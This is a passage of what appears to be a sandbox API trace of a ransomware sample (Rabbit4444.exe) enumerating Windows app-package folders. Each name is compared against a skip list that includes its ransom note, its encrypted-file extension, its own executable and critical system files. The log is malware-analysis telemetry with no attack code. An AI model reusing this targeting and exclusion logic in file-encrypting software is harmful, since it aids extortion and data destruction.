(lpString1="Microsoft.Windows.WindowPicker_cw5n1h2txyewy", lpString2="..") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.Windows.WindowPicker_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.875] lstrcmpiW (lpString1="Microsoft.Windows.WindowPicker_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.Windows.WindowPicker_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.875] lstrcmpiW (lpString1="Microsoft.Windows.WindowPicker_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.Windows.WindowPicker_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.Windows.WindowPicker_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.875] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.WindowPicker_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.WindowPicker_cw5n1h2txyewy") returned="Microsoft.Windows.WindowPicker_cw5n1h2txyewy" [0055.875] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cd20 [0055.875] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x119368 [0055.875] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cd28 | out: ListHead=0xf68b0, ListEntry=0x11cd28) returned 0x11d008 [0055.875] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea0165be, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x8681db72, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x8769207c, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.WindowsAlarms_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.WIN")) returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.WindowsAlarms_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.WindowsAlarms_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.WindowsAlarms_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.875] lstrcmpiW (lpString1="Microsoft.WindowsAlarms_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.WindowsAlarms_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.WindowsAlarms_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.875] lstrcmpiW (lpString1="Microsoft.WindowsAlarms_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.WindowsAlarms_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.875] lstrcmpiW (lpString1="Microsoft.WindowsAlarms_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.WindowsAlarms_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.875] lstrcmpiW (lpString1="Microsoft.WindowsAlarms_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.875] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.WindowsAlarms_8wekyb3d8bbwe" | out: lpString1="Microsoft.WindowsAlarms_8wekyb3d8bbwe") returned="Microsoft.WindowsAlarms_8wekyb3d8bbwe" [0055.876] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d020 [0055.876] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9a) returned 0x11e0b0 [0055.876] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d028 | out: ListHead=0xf68b0, ListEntry=0x11d028) returned 0x11cd28 [0055.876] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4d85f5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc2086555, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xc2086555, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.WindowsCalculator_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.WIN")) returned 1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCalculator_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCalculator_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCalculator_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCalculator_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCalculator_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCalculator_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCalculator_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCalculator_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCalculator_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCalculator_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCalculator_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.876] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.WindowsCalculator_8wekyb3d8bbwe" | out: lpString1="Microsoft.WindowsCalculator_8wekyb3d8bbwe") returned="Microsoft.WindowsCalculator_8wekyb3d8bbwe" [0055.876] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122160 [0055.876] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa2) returned 0x1185a8 [0055.876] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122168 | out: ListHead=0xf68b0, ListEntry=0x122168) returned 0x11d028 [0055.876] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19c767cf, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xef547375, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xef81c039, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.WindowsCamera_8wekyb3d8bbwe", cAlternateFileName="MICROS~3.WIN")) returned 1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCamera_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCamera_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCamera_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCamera_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCamera_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCamera_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.876] lstrcmpiW (lpString1="Microsoft.WindowsCamera_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.877] lstrcmpiW (lpString1="Microsoft.WindowsCamera_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.877] lstrcmpiW (lpString1="Microsoft.WindowsCamera_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.877] lstrcmpiW (lpString1="Microsoft.WindowsCamera_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.877] lstrcmpiW (lpString1="Microsoft.WindowsCamera_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.877] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.WindowsCamera_8wekyb3d8bbwe" | out: lpString1="Microsoft.WindowsCamera_8wekyb3d8bbwe") returned="Microsoft.WindowsCamera_8wekyb3d8bbwe" [0055.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122020 [0055.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9a) returned 0x11e158 [0055.877] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122028 | out: ListHead=0xf68b0, ListEntry=0x122028) returned 0x122168 [0055.877] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3de35df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf1aae2a1, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf1aae2a1, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", cAlternateFileName="MICROS~4.WIN")) returned 1 [0055.877] lstrcmpiW (lpString1="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.877] lstrcmpiW (lpString1="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.877] lstrcmpiW (lpString1="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.877] lstrcmpiW (lpString1="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.877] lstrcmpiW (lpString1="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.877] lstrcmpiW (lpString1="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.877] lstrcmpiW (lpString1="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.877] lstrcmpiW (lpString1="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.877] lstrcmpiW (lpString1="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.877] lstrcmpiW (lpString1="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.877] lstrcmpiW (lpString1="microsoft.windowscommunicationsapps_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.877] lstrcpyW (in: lpString1=0x130eb86, lpString2="microsoft.windowscommunicationsapps_8wekyb3d8bbwe" | out: lpString1="microsoft.windowscommunicationsapps_8wekyb3d8bbwe") returned="microsoft.windowscommunicationsapps_8wekyb3d8bbwe" [0055.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122180 [0055.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x11e200 [0055.877] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122188 | out: ListHead=0xf68b0, ListEntry=0x122188) returned 0x122028 [0055.877] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbed548e8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xbede9823, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xbede9823, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", cAlternateFileName="MIDE9E~1.WIN")) returned 1 [0055.877] lstrcmpiW (lpString1="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.877] lstrcmpiW (lpString1="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.877] lstrcmpiW (lpString1="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.877] lstrcmpiW (lpString1="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.877] lstrcmpiW (lpString1="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.877] lstrcmpiW (lpString1="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.877] lstrcmpiW (lpString1="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.877] lstrcmpiW (lpString1="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.877] lstrcmpiW (lpString1="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.877] lstrcmpiW (lpString1="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.878] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe" | out: lpString1="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe") returned="Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe" [0055.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222a0 [0055.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa4) returned 0x118028 [0055.878] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222a8 | out: ListHead=0xf68b0, ListEntry=0x1222a8) returned 0x122188 [0055.878] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe170ad7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xbd8024eb, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xbd8024eb, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.WindowsMaps_8wekyb3d8bbwe", cAlternateFileName="MID92F~1.WIN")) returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsMaps_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsMaps_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsMaps_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsMaps_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsMaps_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsMaps_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsMaps_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsMaps_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsMaps_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsMaps_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsMaps_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.878] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.WindowsMaps_8wekyb3d8bbwe" | out: lpString1="Microsoft.WindowsMaps_8wekyb3d8bbwe") returned="Microsoft.WindowsMaps_8wekyb3d8bbwe" [0055.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0055.878] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x96) returned 0x113198 [0055.878] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x1222a8 [0055.878] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xb907b89d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xb907b89d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.WindowsPhone_8wekyb3d8bbwe", cAlternateFileName="MI7D5A~1.WIN")) returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsPhone_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsPhone_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsPhone_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsPhone_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsPhone_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsPhone_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsPhone_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsPhone_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsPhone_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsPhone_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.878] lstrcmpiW (lpString1="Microsoft.WindowsPhone_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.878] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.WindowsPhone_8wekyb3d8bbwe" | out: lpString1="Microsoft.WindowsPhone_8wekyb3d8bbwe") returned="Microsoft.WindowsPhone_8wekyb3d8bbwe" [0055.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122080 [0055.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x98) returned 0x113d78 [0055.879] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122088 | out: ListHead=0xf68b0, ListEntry=0x122088) returned 0x122288 [0055.879] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6670683, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x9690fc23, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x96d8829d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", cAlternateFileName="MIA6CE~1.WIN")) returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.879] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe" | out: lpString1="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe") returned="Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe" [0055.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220e0 [0055.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118d38 [0055.879] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220e8 | out: ListHead=0xf68b0, ListEntry=0x1220e8) returned 0x122088 [0055.879] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4097064, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xef652437, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xef8b4999, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.WindowsStore_8wekyb3d8bbwe", cAlternateFileName="MI052B~1.WIN")) returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsStore_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsStore_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsStore_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsStore_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsStore_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsStore_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsStore_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsStore_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsStore_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsStore_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.879] lstrcmpiW (lpString1="Microsoft.WindowsStore_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.879] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.WindowsStore_8wekyb3d8bbwe" | out: lpString1="Microsoft.WindowsStore_8wekyb3d8bbwe") returned="Microsoft.WindowsStore_8wekyb3d8bbwe" [0055.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122040 [0055.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x98) returned 0x113238 [0055.880] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122048 | out: ListHead=0xf68b0, ListEntry=0x122048) returned 0x1220e8 [0055.880] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x94eafafc, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x950534fc, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.XboxApp_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.XBO")) returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxApp_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxApp_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxApp_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxApp_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxApp_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxApp_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxApp_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxApp_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxApp_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxApp_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.880] lstrcmpiW (lpString1="Microsoft.XboxApp_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.880] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.XboxApp_8wekyb3d8bbwe" | out: lpString1="Microsoft.XboxApp_8wekyb3d8bbwe") returned="Microsoft.XboxApp_8wekyb3d8bbwe" [0055.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0055.880] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8e) returned 0x11f2b8 [0055.880] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x122048 [0055.880] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91227223, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x6f3e6702, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x6f58a0ab, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.XboxGameCallableUI_cw5n1h2txyewy", cAlternateFileName="MICROS~2.XBO")) returned 1 [0055.880] lstrcmpiW 